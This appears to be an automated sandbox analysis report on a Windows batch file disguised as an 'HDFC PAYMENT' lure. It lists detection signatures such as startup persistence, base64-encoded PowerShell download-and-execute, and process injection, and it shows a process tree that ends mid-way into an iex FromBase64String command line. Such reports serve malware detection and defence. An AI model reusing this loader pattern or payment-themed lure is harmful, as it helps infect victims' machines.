Windows
Analysis Report
HDFC PAYMENT.bat
Overview
General Information
Detection
Score: 100
Range: 0 - 100
Confidence: 100%
Signatures
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Suspicious command line found
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Classification
- System is w10x64
cmd.exe (PID: 7532, cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\HDFC PAYMENT.bat" ", MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
conhost.exe (PID: 7540, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
cmd.exe (PID: 7584, cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\HDFC PAYMENT.bat", MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
conhost.exe (PID: 7592, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
cmd.exe (PID: 7640, cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\HDFC PAYMENT.bat';iex ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("